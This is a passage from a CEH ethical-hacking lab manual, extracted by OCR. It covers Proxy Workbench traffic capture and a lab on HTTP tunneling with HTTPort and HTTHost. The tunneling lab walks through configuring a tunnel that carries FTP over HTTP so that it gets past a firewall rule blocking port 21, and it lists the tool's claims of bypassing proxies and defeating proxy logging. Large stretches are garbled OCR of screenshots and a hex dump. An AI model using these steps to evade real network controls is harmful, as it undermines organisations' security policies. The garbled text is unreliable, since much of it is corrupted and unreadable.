.. h i IP 060U36W9 06C6 XU>1 1 8 ‫י‬‫״‬ h o d im r M l. 2103 0 )01OOO 322C •57166 2® 16£0 (wmm.... HTTP c tc e -x c 7 ? ttC fiX f ® M Km • iitfr r f fl 5.‫»י‬ 0 ‫־‬M 1000 3 2253 826 >2» « 81:6 ‫י‬ a h (u HTTP (6:0636124 06(636718 3333 0 )010 0 0 3 2 2 5 4 '38JB20612t<a)|iCT*U HI TP C6:Cfc36.166 C6C63E7*9 8 *‫יי‬ hoj 4 1 « ff« l.. 2125 398 ) 0 10.0.0 32255 •3873206126t01icdn.. HTTP 0606X 216 06.0636611 F h o ! dtccrrccC.. 2421 0 )01O O O 322S •3a7320£1;&£C|1‫־‬«fce HTTP CfcC&XSCS <£ffiX fi27 PV.‫־‬Bhatiicerrcct.. 112i 0 )0 1 0 0 0 3 2257 ‫־‬i» 7 8 2 0 6 l2 6 0 H ic eh t HTTP 06*636396 (6 (6 3 6 8 (6 P*v»8 1120 0 )010.0.0.32258 157.165Z262C6e0l«fc HTTP 06C636606 060637.436 FVjB h s d.ccrrecl... 1533 0 nfl. Vicim-iTnaOLCLTl _L*a 65 ? 0 7 4 2 d 4 61 3 6 ‫־‬.‫־‬‫ג‬ SO 3 a 2 0 4 3 5 0 3d 22 40 i f ? 5 S2 2 0 42 5? 53 20 74 6 5 3 • 2 0 5 3 ( 1 74 2c 32 30 31 31 2 0 30 30 3a ? 4 011 0 a 4 ) i i 6e ( e 65 &c Cl ? 3 6 5 C J 0■ 43 i l 303220*36 84‫ל‬6 760 61 72 75 3a 20 41 63 63 M 69 60 6? Od 0a 60 33 4 f i l 20 id 4? 56 61 20 55 4 e 4? 22 Od 0» 44 61 20 32 36 20 4d 61 ? 2 20 3S 32 3a 33 31 20 47 4d 61 74 6? 6( 6■ 3 • 20 6) 60 ?4 65 6a ?4 2d 4c 65 C‫־‬S I 3 0 l« 5 e l. 26 b a r 2011 00 52 31 CUT Conn* c t * o c . : ! » • . Co Btwt-Uimh 20 000160 0001 7 6 000192 000206 000224 000240 000256 0002 7 2 f t All«5ctr»*y ^ SMTP -Ouiflonfl e ‫״‬id |25| peal line dsis t i HTTP P * •/ ■Web (9060) ‫ד‬ClClCl3 to 10 0 0 5 1a a a 3 h>203.85.231.83 |m‫־‬j.Brc> ’ 00031# 68 71 209 176 |abc goc 100031a 50 27 06 207 |edn>m)k| 1a a a 3 la 58.27.86.123 ledue qua 100031a 68 71 220 165 |abc cm 100031a 202 79 210 121 Ibi tav 1QOCl3 b1205 128 84.126 l£«to 100031a 50 27 86 105 |f« * 1ur 100031a 58 27 86 217 100031a 157 166 255 216 |4d1‫׳‬c 100031a 157 166 255 31 imiiv, 100031a 203 85 231 148 lilt 100031a 203 106 85 51 |b kcmc 100031a 50 27 06 225 |s etrrcd 100031a 157.166.226.26 Iw m c 100031a 199 93 62 126 |i2.«*u 100031a 203.106.85.65 liFc.^r 100031a 207 46 148 32|vi*va(£ 100031a 66 235 130 59 Ix-ffccm 10.0031a 203.106.85.177 Ib.scc‫״‬ 100031a 0 26 207 126 ledn vrtt 100031a 157 166 226 32 |tve±a 100031a 58 27 22 72 |r.«*h4m 100031a 190 70 206 126 |icchk 100031a 157 166 226.46 ledlnr^ 100031a 66 235 142 24 |rre41b)< 100031a 203 106 05 176 Idi Mrw 100Q3 I1 157.166.255.13 Immma 1000310 68 71 209173 |4bc fl0< 12L Q2In the Connection Tree, if a protocol or a client/server pair is selected, the Details Pane displays the summary information of all of the socket connections that are in progress for the selected item on the Connection Tree. FIGURE 13.14: Prosy Workbench Generated Traffic in Windows 7 Virtual Machine Lab Analysis Document all die IP addresses, open ports and running applications, and protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 219
  • 137. Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved Proxy W orkbench Proxy server Used: 10.0.0.7 Port scanned: 8080 Result: Traffic captured by windows 7 virtual machine( 10.0.0.7) P L E A SE TALK T O YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D TO T H I S LAB. Questions 1. Examine the Connection Failme-Termination and Refusal. 2. Evaluate how real-time logging records everything in Proxy Workbench. Internet Connection Required 0 Yes □ No Platform Supported 0 Classroom □ iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 220
  • 138. Module 03 - Scanning Networks HTTP Tunneling Using HTTPort HTTPo/f is aprogramfrom HTTHosf thatmates a transparenttunnelthrough a pm xj servero rfrenal! Lab Scenario Attackers are always in a hunt for clients that can be easily compromised and they can enter these networks with IP spoofing to damage or steal data. The attacker can get packets through a firewall by spoofing die IP address. If attackers are able to capture network traffic, as you have learned to do in the previous lab, they can perform Trojan attacks, registry attacks, password hijacking attacks, etc., which can prove to be disastrous for an organization’s network. An attacker may use a network probe to capture raw packet data and then use this raw packet data to retrieve packet information such as source and destination IP address, source and destination ports, flags, header length, checksum, Time to Live (TIL), and protocol type. Therefore, as a network administrator you should be able to identify attacks by extracting information from captured traffic such as source and destination IP addresses, protocol type, header length, source and destination ports, etc. and compare these details with modeled attack signatures to determine if an attack has occurred. You can also check the attack logs for the list of attacks and take evasive actions. Also, you should be familiar with the HTTP tunneling technique by which you can identify additional security risks that may not be readily visible by conducting simple network and vulnerability scanning and determine the extent to which a network IDS can identify malicious traffic within a communication channel. 111this lab you will learn HTTP Tunneling using HTTPort. Lab Objectives This lab will show you how networks can be scanned and how to use HTTPort and HTTHost Lab Environment 111die lab, you need die HTTPort tool. I C O N K E Y Valuable information Test your knowledge 3 Web exercise Q Workbook review’‫׳‬ Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 221
  • 139. Module 03 - Scanning Networks ■ HTTPortis located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksTunneling ToolsHTTPort ■ You can also download the latest version of HTTPort from die link littp:/ Avww.targeted.org/ ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ Install HTTHost 011 W indows Server 2008 Virtual Machine ■ Install HTTPort 011 Windows Server 2012 Host Machine ■ Follow the wizard-driven installation steps and install it. ■ Administrative privileges is required to run diis tool ■ This lab might not work if remote server filters/blocks HTTP tunneling packets Lab Duration Time: 20 Minutes Overview of HTTPort HTTPort creates a transparent tunneling tunnel dirough a proxy server 01 firewall. HTTPort allows using all sorts of Internet Software from behind die proxy. It bypasses HTTP proxies and HTTP, firewalls, and transparent accelerators. Lab Tasks Before running die tool you need to stop IIS Admin Service and World Wide Web Publishing services on Windows Server 2008 virtual machine. Go to Administrative Privileges Services IIS Admin Service, right click and click the Stop option. 01 HTTPort creates a transparent tunnel through a proxy server or firewall. This allows you to use all sorts of Internet software from behind the proxy. Stopping IIS Services 2 . £ " Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 222
  • 140. Module 03 - Scanning Networks Ka-n- * I CeKri3bcn | 5:«b_s '*,FurcBon Discovery Provide Host N w ta o c e.. , Stated P-rcocn Decovery Resource P J> l3ten P -behes t... Started -C^C-rOiP Poicy C en t The serve... Started Key a id Cerbftrate Mens9»trp-t P‫־‬ovde* X... £,hjm a1 ir te 'f c • Devise Attest E-ajtet os 3 .* v o r •v m u txchanoa s w a P 0 ‫־‬vd81 a .. . Started 1Cfcnyoer-v Gue»t Shutdown Se‫׳‬ v»oe fvovdes a .. . Started ■S^Hyp*r*VHurBjMt 5 n v c » M o'ibn th.. t*d‫׳‬5 la. '^,hvsf'-v Tir* Synctvonm to ' S a v e • Syrxh'Cnj.. 5:*U d ‫'־׳‬• x ‫׳‬ « voiuneShjaowCoovRM uM Br coctdn jte . _ 1 u ‫־׳‬ted ‘ £ , 3 2 a‫־־‬d Au0!:P !P t•: Ktyttg ModJ«t CfeInteracave services Detection S tJ t__________ St* lid 4 Internet Cornecton Shwrng CCS) • £ !P h d p ‫־‬f £ ,:P sec Polcy Agent P.-llv jn ... Res- r e R essrr S lated . Stated ‫־‬J kctR.t1*cr 3£trbuted Tra-samon Coordnsso£: AITmks ►3te , Started ^ I n it-to v e ‫־׳‬Tosoocv Discovery 1“tepee- ...0‫־‬----- ?iw icroajft KETFrans0‫״‬ rk NGB< v3 0.50727_kfr■ R£^G^1 Sia-ted ^.M toosoft .KCTFraiKWOrkNS&l v : 0.50727_>« Proprf br% t .... Stated '■*,M 0090* Fbre channel ?Istfo'n R e3 st3 ‫»־‬ n Se‫״‬ 8‫־‬ t.. w b , ‫ן‬^ Mictom4?6CSI ]ntigtor Service ^ V b o n * ! 5 ‫כ‬) | ‫י‬ »‫ז‬ Shacton Copy P 'ordfi W r a g n «... Q,M0Jla M anttnaioa S w vct ‫•ויז‬ Mojll*.. J IIS Admin Scrvict Sioo th- service 5.estart t h e se v c e D ocrpton: Enabltc 6 « ‫־‬11‫י‬ >« to *d1‫־‬nvj!t‫•־‬ ::s ‫יי־‬‫׳‬‫׳‬ » : « * « « H5 ‫׳‬X 'J tK C »r*ou‫׳‬M10n *or‫«ימ‬ SK*®one FTP 1*rvior* th u m v te • ttauprd. :‫»־‬ i«‫׳‬v«' nil 2* u 1«6* to amfg.«« S-—3or ftp. :, the servce e dsxcd. an, s e 1 /‫׳׳‬ee* *v 9 !t» p o rv dfpeo; * m I faI to tU t t. >t:p jcrvce IL Acrrr S trVtt on loco CaiOutt* FIGURE 14.1: Stopping IIS Admin Service in Windows Server 2008 3. Go to Administrative Privileges Services World Wide Web Publishing Services, right-click and click die Stop option. -Tllx] *te Action jjen tela N + l t w l ‫י‬‫ר‬ A l-' I B rrfE f [ > | £ I S f n » M (lo ca l)ServwjClomJ) World VVxicWeb PwbW-mg S tm i ‫־‬ 1CwJOCor IS!aw j (^<r1tu4 Ptcr>*0M‫...זו‬ ‫י‬2‫צ‬ ne servce 1!<” ‫׳‬v r!ttt’.ct ^ vau''* S‫*״‬to/. Cooy C^iVeo Mir^wwnt Se‫<׳־‬ce MWU0K*... TUtWtbM.. £fetYrd»/.e Audo Mo'eOcSa... C«so1aion: (V»1‫׳‬df1Web an‫־‬w r<rr end ari'iprsron rry.y■fc:‫־‬r r InfonrnstonSerMoesHjrage- ^ 1'‫<־׳‬to/.s AuctoErekJrtitSJan ^ 1Y‫<־־‬to/.SCotorSySteri Ha'sOeid... ‫־‬he WaPl.. £(Mfld0M DectoymeotSevcesSesa Ha'cOes r... £5.%Yf‫־‬tto/.9DriverFourdsoon -Lee ‫״‬cce Drver“ ‫־‬ *‫׳‬ xr■ Ma-aoe; u... «Y‫־־‬d3‫./׳‬s & ‫׳‬0‫׳‬ Repo8‫יט‬‫׳‬ Ser1ce flj%Yrd»/.9E‫׳‬e 1t Cotecto %V'tkr/.$®‫׳‬ei: uw ^>Yrd0/,s F»e.dl Ab1‫־‬.-sero... Thssevfc... Thssevfc... ViWowsF.. Sated Stated . Stated (^»Y‫־׳‬d0/.9tnsteller I a a t Adds, mod■.‫״‬ CJt«Yrtto/.9»^1‫?׳‬gen‫־‬e1t 1 «‫י׳«יו״‬5‫י׳ז‬ ‫קמי׳‬ ftovd» a ... Stated «v‫־׳‬d0/,9ModiiesInjuler &»ab«ns... Stated Ci«Y‫׳‬xto/.®Biocen ActivationSetv'd I ^ r ‫•יזל‬ wndo... Stated C( •Y'-do’/.* 5«mote M Re*»t VJ«o‫״‬ »B... Stated £^.'‫־׳‬rt>/.« try AlTMka * Mints‫*׳‬ S... stand ^ iV'tte/.fl updat# ‫...־י‬ statid ^*vrHnp webpw v Auto-ceeovJ ^ .v ‫<»׳‬-Autocar*c Perfcrwsrce Aflao*f KrHTTPl... H nyrB fi Pre0 6*0^‫־‬.. •'08>'‫׳‬t3ecr bet) Stared J E 3 S J B £ x a r d e ; A / £‫:־‬c -T ‫;'׳‬g .‫־‬',o'c '■,.e: -vt»e-‫־‬n ; sr.-g .:•r: co‫־־‬tx :r & It bypasses HTTPS and HTTP proxies, transparent accelerators, and firewalls. It has a built-in SOCKS4 server. FIGURE 142: Stopping World Wide Web Services in Windows Server 2008 Open Mapped Network Drive “CEH-Tools" Z:CEHv8 Module 03 Scanning NetworksTunneling ToolsHTTHost Open HTTHost folder and double click htthost.exe. Tlie HTTHost wizard will open; select die Options tab. On die Options tab, set all die settings to default except Personal Password field, which should be filled in widi any other password. 111diis lab, die personal password is kmagic.'? ‫ט‬ It supports 4. strong traffic encryption, which 5. m akes proxy logging useless, 6. and supports 7. NTLM and other authentication schem es. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 223
  • 141. Module 03 - Scanning Networks 8. Check die Revalidate DNS nam es and Log Connections options and click Apply HTTHost 1.8.5 N etw ork Bind e x te rn a l to : 10.0.0.0 Port: [80 P e rs o n a l p assw ord: Bind lis te n in g to : |0 .0.0.0 A llow access fro m : 10.0.0.0 [‫־‬ P a s s th ro u g h u n re c o g n iz e d re q u e s ts to : H o s t n a m e o r IP : P o rt: O rig in a l IP h e a d e r fie ld : | x ‫־‬O rig in a l‫־‬ IP|8 1 T im e o u ts : 1 1 2 7 .0 .0 .1 M a x . local b u ffe r: 2‫־‬1=0|3‫־‬ A pply R e v a lid a te DNS n a m e s Log co n n ectio n s‫־‬ S tatis tics ] A p p licatio n log |^ 3p tio n s jj" S e c u r'ty | S e n d a G ift) FIGURE 14.3: HTTHost Options tab 9. Now leave HTTHost intact, and don’t turn off Windows Server 2008 Virtual Machine. 10. Now switch to Windows Server 2012 Host Machine, and install HTTPort fiom D:CEH-ToolsCEHv8 Module 03 Scanning NetworksTunneling ToolsHTTPort and double-click httport3snfm.exe 11. Follow die wizard-driven installation steps. 12. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop. FIGURE 14.4: Windows Server 2012 - Desktop view 13. Click die HTTPort 3.SNFM app to open die HTTPort 3.SNFM window. & To set up HTTPort need to point your browser to 127.0.0.1 & HTTPort goes with the predefined mapping "External HTTP proxy‫״‬ of local port Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 224
  • 142. Module 03 - Scanning Networks 5 t 3 f t Administrator Server Manager Windows PowerShell G oogle Chrome Hyper-V Manager HTTPort 3.SNPM i. m » 91 1 Con>puter *‫נ‬ Control Panel V Hyper-V Virtual Machine... SOI 5f‫׳‬ w r in c a k n o r Ccntof.~ n £ Command Prompt M021IU Firefox Nctwodc ‫״‬ ‫״‬ ■ ‫י‬ ‫י‬ -“■ ‫־‬‫־‬‫־‬F © if Proxy W orkbea. M egaPng - T *8 Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks FIGURE 14.5: Windows Server 2012 - Apps 14. The HTTPort 3.SNFM window appears as shown in die figure diat follows. For each software to create custom, given all the addresses from which it operates. For applications that are dynamically changing the ports there Socks4-proxy mode, in which the software will create a local server Socks (127.0.0.1) '‫־‬r°HTTPort 3.SNFM S ystem j Proxy :j por^ m apping | A bout | R egister | HTTP proxy to bypass (b la n k = direct or firew all) Host n a m e or IP address: Port: Proxy requires authentication U s ern am e: Password! Bypass m ode: Misc. options U ser-A gent: IE 6 .0 Use personal re m o te host a t (b la n k = use public) Host n a m e or IP address: Port: Password: I-------------------------------- P I-------------- Start? 4— This button helps FIGURE 14.6: HTTPort Main Window 15. Select die Proxy tab and enter die host name or IP address of targeted machine. 16. Here as an example: enter Windows Server 2008 virtual machine IP address, and enter Port number 80 17. You cannot set die Username and Password fields. 18. 111die User personal remote host at section, click start and dien stop and dien enter die targeted Host machine IP address and port, which should be 80. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 225
  • 143. Module 03 - Scanning Networks 19. Here any password could be used. Here as an example: Enter die password as ‘*magic‫״‬ In real world environment, people som etim es use password protected proxy to make company em ployees to a c c e ss the Internet. 20. Select die Port Mapping tab and click Add to create New Mapping Q HTTHost supports the registration, but it is free and password-free - you will be issued a unique ID, which you can contact the support team and ask your questions. 21. Select New Mapping Node, and right-click New Mapping, and click Edit 1 - 1 °HTTPort 3.SNFM*‫ב‬ A bout | R egister JPort m appingSystem | Proxy Static T C P /IP port m appings (tu n n els) 1‫םייים‬1 LEDs: ‫ם‬ □ □ □ O Proxy Q New m apping Q Local port 1-0 (3 R e m o te host — re m o te , host, n a m e □ R e m o te port 1_0 Select a m apping to se e statistics: No stats - select a m apping n /a x n /a B/sec n /a K Built-in SOCKS4 server W Run SOCKS server (p o rt 1 0 8 0 ) A vailable in "R em o te Host" m o d e : r Full SOCKS4 support (B IN D ) ? | 4— This button helps FIGURE 14.8: HTTPort creating a New Mapping r|a HTTPort3.SNFM | 3 ' ‫־‬ x S ystem Proxy | p0 rt m ap p in g | About | R egister | HTTP proxy to bypass (b la n k = direct or firew all) Host n a m e or IP address: Port: | 1 0 .0 .0 .4 |80 Proxy requires authen tication U s ern am e: Password: Misc. options U ser-A g en t: Bypass m o d e : | IE 6 .0 | R e m o te host Use personal rem o te host a t (b la n k * use public) Host n a m e or IP address: *o rt: P assv»rd: |1 0 .0 .0 .4 I80 |............ 1 ? | <— This button helps Start FIGURE 14.7: HTTPort Proxv settings rindow Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 226
  • 144. Module 03 - Scanning Networks T3 3HTTPort 3.SNFM System | Proxy Port m apping | A bout | R egister | Static T C P /IP port m ap p in g s (tu n n els) Add R em o ve New m ao □ Local p 0 ■ Edit ‫ש‬ LEDs: □ □ □ □ O Proxy 0 R e m o te host re m o te , host, n a m e (=J R e m o te port L_o Select a m apping to se e statistics: No stats - select a m apping n /a x n /a B/sec n /a K Built-in SOCKS4 server W Run SOCKS server (p o rt 1 0 8 0 ) A vailable in "R em o te Host" m o d e: r Full SOCKS4 support (B IN D ) ? | 4 — This button helps FIGURE 14.9: HTTPort Editing to assign a mapping 22. Rename this to ftp certified hacker, and select Local port node; then light- click Edit and enter Port value to 21 23. Now right click on Remote host node to Edit and rename it as ftp.certifiedhacker.com 24. Now right click on Remote port node to Edit and enter die port value to 21 r * I HTTPort 3.SNFM - 1 ° r x • 1 S ystem | Proxy Port m apping | A bout | R egister | r Static T C P /IP port m appings (tu n n els) •.•‫.=•׳‬-1=1 / s Add 0 ‫־‬ Local port 5 -2 1 R em o ve 0 R e m o te host ftp.certifiedhacker.co m E5 R e m o te port = I— 21 V Select a m apping to see statistics: LEDs: No stats ‫־‬ inactive ‫ם‬ □ □ □ n /a x n /a B/sec n /a K O Proxy 1d u l i t ‫־‬ in s e r v e r W Run SOCKS server (p o rt 1 0 8 0 ) A vailable in "R em o te Host" m o d e: I” Full SOCKS4 support (B IN D ) | ? | This button helps FIGURE 14.10: HITPort StaticTCP/IP port mapping 25. Click Start on die Proxy tab of HTTPort to run die HTTP tunneling. Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S In this kind of environment, the federated search webpart of Microsoft Search Server 2008 will not work out-of- the-box because w e only support non-password protected proxy. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 227
  • 145. Module 03 - Scanning Networks ‫־‬r a :HTTPort 3.SNFM System ^ o xy | Port m ap p in g | About | R egister | - HTTP proxy to bypass (b la n k = direct or firew all) Host n a m e or IP address: Port: |1 0 .0 .0 .4 [80 Proxy requires authen tication U s ern am e: Password: Bypass m o d e: ‫ד‬ ‫נ‬ [R e m o te host Misc. options U ser-A gent: IE 6 .0 Use personal re m o te host a t (b la n k = use public) Host n a m e or IP address: Port: Password: |10.0.0.4 [So ‫*ן‬**‫*״‬ ? | ^— This button helps FIGURE 14.11: HTTPort to start tunneling 26. Now switch to die Windows Server 2008 virtual machine and click die Applications log tab. 27. Check die last line if Listener listening at 0.0.0.0:80, and then it is running properly. (J3 HTTP is the basis for Web surfing, so if you can freely surf the Web from where you axe, HTTPort will bring you tlie rest of the Internet applications. HTTHost 1.8.5 Application log: MAIN: HTTHOST 1.8.5 PERSONAL GIFTWARE DEMO starting^ MAIN: Project codename: 99 red balloons MAIN: Written by Dmitry Dvoinikov MAIN: (c) 1999-2004, Dmitry Dvoinikov MAIN: 64 total available connection(s) MAIN: netv/ork started MAIN: RSA keys initialized MAIN: loading security filters... MAIN: loaded filter "grant.dll" (allows all MAIN: loaded filter "block.dll" (denies al MAIN: done, total 2 filter(s) loaded MAIN: using transfer encoding: PrimeScrambler64/SevenTe grant.dll: filters conections block.dll: filters conections !LISTENER: listening at C.C .0 .C:sT| connections within I connections withir z ] Options Security | Send a Gift( A p p lica tio n logStatistics Q To make a data tunnel through the password protected proxy, so we can map external website to local port, and federate tlie search result. FIGURE 14.12 HTTHost Application log section 28. Now7switch to die Windows Server 2012 host machine and turn ON die Windows Firewall 29. Go to Windows Firewall with Advanced Security Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 228
  • 146. Module 03 - Scanning Networks 30. Select Outbound rules from die left pane of die window, and dien click New Rule in die right pane of die window. ‫־‬-■ - : ° ‫־‬Windows Firewall v/ith Advanced Security F ie Action View Help Outbound Rule* New Rule... V Filter by Profile V Filter by State 7 Filter by Group View O Refresh Export List... Q Help O utbound R u in Nam e Group Profile Inabied A © B ‫׳‬ anchCa(heC0nt«n:Rat1i«val (HTTP-0... BranchCache- Content Retc... A l No © B rsn ch C ech e H orfed Ca<t!e Cbent IHTT... BranchCache - Hosted Cech - A l No © B ra n c h C e ih e K n W J C •ch • S*rvw(HTTP. BranchCache - Hotted C a d i. A l No © B ra n ch C ache Peer Dncovery (W SD Out) B ran ch (arhr - PeerOtseove... A l No © C o ‫׳‬« Networking • D N S <U0P-0ut) Core Networking A l Yes ■ © C o r e Netw orking- D>1v> m -eH o*Config... Core Networking A l Yes © C o r e Networking ‫־‬ Dynam ic H ost Config... Core Networking A l Yes © C o r e N e tw o r k n g ‫־‬ Grcup Policy (ISA5S‫־‬~ Core Networking Deane■! Ves © C o r e Networking - 5 ‫׳‬cup P o k y (NP-Out) Core Networking Domain Yes © C oreN etw ork w ig - Group Policy CTCP-0-. Core Networking Deane•! Yes © C o r e N etworking - Internet Group Mana... Core Networking A l Yes © C o r e N etworlnng - IPHTTPS CTCP-Out] Core Networking A l Yes © C o r e N etworking - IPv6 (IP v 6 0 ‫־‬ut) Core Networking A l Ves © C o r e NetworVwg ‫־‬ M ulbeost listener Do-. Core Networking A l Ves © C o r e Networking - M ulocast Listener Q u~ Core Networking A l Yes © C o r e Network*!g - M ulticast I!stener Rep~ Core Networking A l Ves © C o r e Networking • M utecjst Listener Rep... Core Networking A l res © C o r e N etworking - N eighbor Dnc every A... Core Networking A l Ves © C o r e Networking N eighbor D iscoveryS.- Core Networking A l Yes © C o r e N rtw o fk n g ‫־‬ Packet 1c o Big (ICMP-. Core Networking A l V o © C o r e Networking Parameter Problem (I- Core Networking A l Ves © C o r e N etworking - P.cutei A dvertnem ent... Care Networking A l Vet © C o r e Networking - P.cuur S o ic ta e o n (1C.. Core Networking A l Yes (red o (UOP-Out!*‫־‬* ^Core Network© Core Networking A l Vet v ' "■i T r " ........... ‫ז‬- W indows F1rew,5ll w ith Adv! Q Inbound R u in ■ O utbound Rules | Connection Security Ru ‫•ן‬ ^ M onitoring FIGURE 14.13: W1ndcra*sFirewallwith Advanced Secuntywindow in Window's Server 2008 31. 111die New Outbound Rule Wizard, select die Port option in die Rule Type section and click Next p N e w O u tb o u n d Rule W izard ■ R u le Type Select the type cf firewall ruleto create Steps. * Rule Type What :ype of rue wodd you liketo create? 4 Protocol and Ports « Action O Program « Profle Rde Bidt controls connectionsfor a program. « flame ‫>§י‬ Port | RJe twl controls connexionsfor a TCP or UDP W . O Predefined: |BranrhCacne -Content Retrieval (Ueee HTTP) v 1 RJe t a controls connectionsfor a Windows experience. O Custom Cu3tomrJe <Beck Next > 11 Cancel FIGURE 14.14: Windows Firewall selecting a Rule Type £ ‫ז‬ Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S Tools demonstrated in this lab are available in Z: Mapped Network Drive in Virtual Machines Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 229
  • 147. 32. Now select All remote ports in die Protocol and Ports section, and click Next Module 03 - Scanning Networks New Outbound Rule Wizard Protocol and Porta Specify the protocols and ports to which ths rJe apofes Doest‫*־‬srule aoptyto TCP or UDP? <!•> TCP O UDP Does tnis n ie aoply tc all remote ports or specific renote port*9 ! ? m o t e p o d s O Specificremoteports: Example 80.443.5000-5010 CancelNed ><Eacx Steps + R u• 'yp • 4 Prctocol and Ports 4 Acaor 4 Profile 4 Name Q HTTPort doesn't really care for the proxy as such, it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets HTTP protocol through. FIGURE 14.15: Windows Firewall assigning Protocols and Ports 33. 111 die Action section, select die Block the connection'’ option and click Next New Outbound Rule Wizard A c tio n Spccify the acton to be taken when ‫ס‬ conncction •naccheathe condticna specified in the n ie . Steps 4 H U e Type W h a t acbo n o h o J d b« ta k e n w h o n a c o n n e x io n m atch 08tho o p oc/iod con citicn Q 7 4 P roto co l a n d Porta O Alowttvconnection T Tw n c lx J e s c o rn c c tio n a that a ie pio tecto d w th IP ao c 09 w e l c s t‫־‬w 3 e ate not. O Alow Itic cw iicdiui If MIs secuie Ths ncbdes only conrections thar. have been a1ihent1:ated by usng IPsec. Connections wil be secued using the settngs in IPsec p‫־‬op5rtes and nJes n the Conrecion Security RuteTode. 4 A c io n 4 Profile 4 Nam e Q You need to install htthost on a PC, who is generally accessible on the Internet - typically your "home" PC. This means that if you started a Webserver on the home PC, everyone else must be able to connect to it. There are two showstoppers for htthost on home PCs '• ) H o c k t h e c o n n e c t io n Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 230
  • 148. Module 03 - Scanning Networks FIGURE 14.16: Windows Firewall setting an Action 34. 111 die Profile section, select all three options. The rule will apply to: Domain, Public. Private and then click Next *New Outbound Rule Wizard Profile Specify the proflesfor which this rule applies Whendoes#‫מו‬ruleapply’ 171 D am an Vpfces *I en a computer is connected to Is corporate doman. 0 P r iv a te 3ppies wt en a computer is connected to a pivate oetwak bcabcn. such as a home 3rwor<pi ce B Public Vp*‫״‬c3 cn a ccmputcr io ccon cctcd to a p jb lc nctwoiK kcooon CancelNext >c Eacx Skin * Ru*Typ# 43rctocol anc Ports # *cbor 3rcfile Q NAT/firewall issues: You need to enable an incoming port. For HTThost it will typically be 80(http) or 443(https), but any port can be used - IF the HTTP proxy at work supports it ‫־‬ som e proxys are configured to allow only 80 and 443. FIGURE 14.17: Windows Firewall Profile settings 35. Type Port 21 Blocked in die Name field, and click Finish New Outbound Rule Wizard N a m e Specify the name and desorption of this li e . N o n e |?or. 2' BbdceJ Desaiption (optional): CancelFinish<Back ZZy Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks £ 3 The default TCP port for FTP connection is port 21. Sometimes the local Internet Service Provider blocks this port and this will result in FTP Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C®W<EAfl*1MaW&al Page 231
  • 149. Module 03 - Scanning Networks FIGURE 14.18: Windows Firewall assigning a name to Port 36. The new rule Port 21 Blocked is created as shown in die following figure. 1-1 “1 * :Windows Firewall with Advanced Security F ie Action View H d p A» tio ro Outbound Rules New Rule... V Filter by Profit• V Fliter byState V Filter by Gioup View Q Refresh [a» Export List... L i Help Port 21 Blocked * Disable Rule 4 cut Gfe Copy X ‫ם‬»‫»ו‬‫♦ז‬ ( £ | Propeitie* U Help A l :1 A l A l A l A l A l D om ain D om ain Dom ain A l A l A l A l A l A l A l A l A l A l A l A l A l BranchCache • Content Retr.. B i.n c h ( m h r • H otted Cach BranchCache • H otted Cach BranchCache • Peer Discove.. Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking C ote Networking Cote Networking Core Networking Core Networking Core Networking Cor• Networking Core Networking Core Networking CortNttwQiking Core Networking Core Networking Core Networking Na [O^Port 21 Blockcd © B ran ch C ach e Content R c trc v tl (H T T P -0 .. © B ra nch(*! h e H o tte d C ache Client (H IT . © BtanchCache Hosted Cache $erv*1(HTTP... © B ran ch C ach e Peer Oiseevery //SD Cut) © C o r e Netw orking ‫־‬ ONS(UOP-OutJ © C o ie N etw orkin g- Dynam ic H o d Config.. © C o r e Netw orking - Dynam ic H ost Config... © C o r e Netw orking - Group Pcfccy CLSASS-- @ PCore Netw orking - Group PcEcy (fJP-Out) © C o r e Netw orking - Group P o ic y (TCP-O -. © C o r e Netw orking - internet Group Mana... © C o r e N etw orkin g- lPHTTP5(TCP-O utJ © C o t e Netw orking - Pv6 (Pw6-0ut) © C o r e Netw orking V u h cast Listener Do‫״‬ © C o r e Netw orking M u h <yt* listener O j ‫״‬ . © C o ie Kielw ort m g • M u l1<«U Iktenet Rep. © C o r« Netw orking • V u h cast -Ktener Rep. © C o r e Netw orking rfcignfccf Discovery A... © C o r .1Netw orkm g • Neighbor Discovery 5 , ©Coie Networking - F«.h&Tv. Big KM P.. © C o r e Netw orking - Parameter Problem (I.. © C o r e Netw orking ‫־‬ Router Ad.ertcem ent... 